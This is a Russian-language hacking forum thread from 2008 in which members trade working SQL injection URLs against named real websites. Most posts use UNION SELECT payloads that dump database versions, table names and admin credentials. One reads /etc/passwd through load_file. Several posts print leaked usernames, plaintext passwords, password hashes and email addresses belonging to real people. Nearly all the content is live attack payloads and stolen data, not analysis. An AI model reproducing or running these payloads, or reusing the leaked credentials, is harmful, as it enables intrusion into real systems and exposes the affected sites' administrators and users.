ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
06.07.2008, 08:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Davinciinstitute.com - PR 6
http://www.davinciinstitute.com/page.php?ID=-1'+union+select+1,2,3,concat_ws(0x3a,LoginName,Pas sword),5,6+from+AdminUsers/*
как разшифровать? попробвал hex(ascii)=md5
Bouldertheater.com - PR 6
http://www.bouldertheater.com/event_detail.php?id=999999+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41+from+information_schema.tables+limit+1 7,1--
Umpcportal.com - PR 6
http://www.umpcportal.com/products/product.php?id=9999999+union+select+version(),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Linspire.com - PR 7
http://www.linspire.com/linspire_letter_archives.php?id=9999999+union+sele ct+1,version(),3,4/*
Allianceforbiz.com - PR 6
http://www.allianceforbiz.com/events/specific_event.php?id=999999+union+select+1,versio n(),3,4/*
Koleso.topof.ru - PR 4
http://koleso.topof.ru/testing_info.php?id=9999+union+select+1,2,concat_w s(0x3a,admin_login,admin_password),4,5,6,7+from+ko leso_ktopof.admins/*
Cccs.com - PR 5
http://www.cccs.com/index.php?id=99999+union+select+1,2,3/*
увы.. но для вывода нужно зарегатся..(
Последний раз редактировалось sabe; 13.07.2008 в 07:44..
|
|
|
06.07.2008, 11:25
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
Да, чёта меня на метео потянуло...
gismeteo.ru
Google PR 6 / 10
Яндекс тИЦ 19000
http://avia.gismeteo.ru/avia.php?id=27612+union+select+1+limit+1,1--
Database Version: 4.1.1-alpha-standard
Database name: search
User name: root@localhost
__________________
BlackHat. MoDL
|
|
|
|
06.07.2008, 12:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Viperson.ru - PR 4
http://www.viperson.ru/wind.php?ID=999999+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(Version()),0x71),0x71)/*
Cyberthing.net - PR 3
http://www.cyberthing.net/video-play.php?id=9999+union+select+1,table_name,3,4,5,6 ,7+from+information_schema.tables/*
Dimi4
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(load_file(0x2F6574632F706173737764),0x71),0x7 1)+limit+1,1--
load_file никто не отменял..)
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(concat_ws(0x3a,user,password),0x71),0x71)+fro m+mysql.user+limit+1,1--
и это. но сдесь почемуто на рута пасса нету 
Последний раз редактировалось sabe; 06.07.2008 в 12:57..
|
|
|
|
06.07.2008, 15:27
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
pr-cy.ru
pr-cy.ru
http://pr-cy.ru/faq/-21+union+select+1,2,3.html
5.0.51a-community-log
доступны только стандартные таблицы и одна таблица FAQ ..
|
|
|
|
06.07.2008, 18:24
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Ну что же друзья...а вот и я
http://www.gathsports.com/productsingle.php?id=1%27+UNION+SELECT+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
Database Version: 5.0.22
Database name: web56_db1
User name: web56_u1@localhost
в БД единственная интересная на мой взгляд таблица login с колонками username и password
там всего 2 записи
ric:letmein
sue:letmein
админку не искал...
всем спасибо
Ну а теперь предлагаю вашему вниманию сайт с ПР6, www.jurnalul.ro очень известный и популярный в Румынии журнал, на самом сайте я ничего интересного не нашел...но через суб домен... http://copiidisparuti.jurnalul.ro я обнаружил скулю и соответственно и база у них одна.Админ и редакция были мной уведомлены еще месяц назад, так как они ничего не придпренимают..выложил так сказать в паблик
http://copiidisparuti.jurnalul.ro/detalii.php?s=1&id=149+union+select+1,concat_ws(0x 3a,user(),version(),database()),3,4,5,6,7,8,9+limi t+1,1/*
Database Version: 5.0.24a
Database name: copiidisp
User name: jurnalul@localhost
В БД 2 базы но нам интересна база jurnalul_site где находится информация нужная нам..то есть админы
admins
admin_username, admin_password
admin:qZpD7%uJqdJ.
flori:nokia
claudiugamulescu:claudiu
diana:karakum
aleks:huinea
последний в записях админа скорее всего молдованин или руский который работает в редакции, так как пароль скажем так с русской спецификой.
Всем спасибо.
Пойдем дальше...
http://www.radiogaga.ro/listgalerii.php?idgalerie=1+union+select+1,2,aes_d ecrypt(aes_encrypt(concat_ws(version(),database(), user()),0x71),0x71),4,5,6,7,8,9/*
Database Version: 4.1.13a RDS Hosting Databases
Database name: radiogaga
User name: radiogaga@localhost
кроме phpbb_users не нашел ничего
user_password, username
6be414417e0001f12039083621f436cc:avitus----> Alamo97
41955c3830838c240729b92550c12dd9:Francisc Pataki
f07fa1d519bf547c76ba56b732c2cd27:Kraus Kinga
09909326d2ba3e970de66c159b05bdf6:Misi
81ef1753db31e4c85dbc18b9c751d336:OLi!
905492bc9379a5efde0923283fc82d00:gerbera51
bc9850b32b863fd80cdf7ef63c183759:gravamen_1686
b1932d548fa7208117e4d332c378c532:castigo1307
http://www.tailormadetours.com.au/emailtofriend.php?ID=-1+UNION+SELECT+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48/*
Database Version: 5.0.46
Database name: ttours
User name: ttour@203.130.164.130
вывод в поле Your Message
В БД 3 базы :
test
test_cms_database
ttours
только в первой есть таблица users ..но в ней только
userid
username
emailaddress
3:shayne:shayne@adimpact.com.au
4:mike:mike@adimpact.com.au
у кого есть желание поковырятся..милости просим.Спасибо всем.
Последний раз редактировалось Gorev; 06.07.2008 в 19:35..
|
|
|
|
06.07.2008, 22:21
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
PR 4
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(version(),0x3a3a,user(), 0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6/*
version(): 5.0.45-community
user(): blackgos_test@localhost
database(): blackgos_bgppromos
http://www.blackgospelpromo.com/admin/contest.php
тут есть кое что интересное=)
Последний раз редактировалось gisTy; 06.07.2008 в 23:01..
|
|
|
|
06.07.2008, 22:28
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от gisTy
доступ к information_schema закрыт..
Я открыл его 
_http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+information_schema.tables+limit+ 17,1/*
Таблица admin_user в титле
Сам ковыряй, если надо
_http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(user_name,0x3a,user_pass ),4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin_user/*
j1prophet:BEAtrice
Последний раз редактировалось jokester; 06.07.2008 в 22:34..
|
|
|
|
06.07.2008, 22:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
аа.. ступил... просто поставил в строку information_schma.tables... спасибо=)
|
|
|
|
06.07.2008, 23:14
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Allnight.ru - PR 3
http://www.allnight.ru/news/?category=1'+union+select+1,2,version(),4,5,6,7,8, 9,10,11,12/*
|
|
|
|
07.07.2008, 07:57
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
www.photo.buyyourstockphotos.com
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--
version(): 5.0.51a-3ubuntu5.1
user(): buystock@localhost
database(): buystock
file_priv к сожалению нет..
так как версия пятая, то есть база information_schema.. из нее берем названия таблиц:
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from +information_schema.tables+limit+1,1--
есть табличка users.. смотрим какие в ней колонки
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.columns+where+table_name=0x75 73657273+limit+1,1--
и делаем вывод из таблицы
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,user,pass),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27+from+buystock.users--
все очень просто=)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид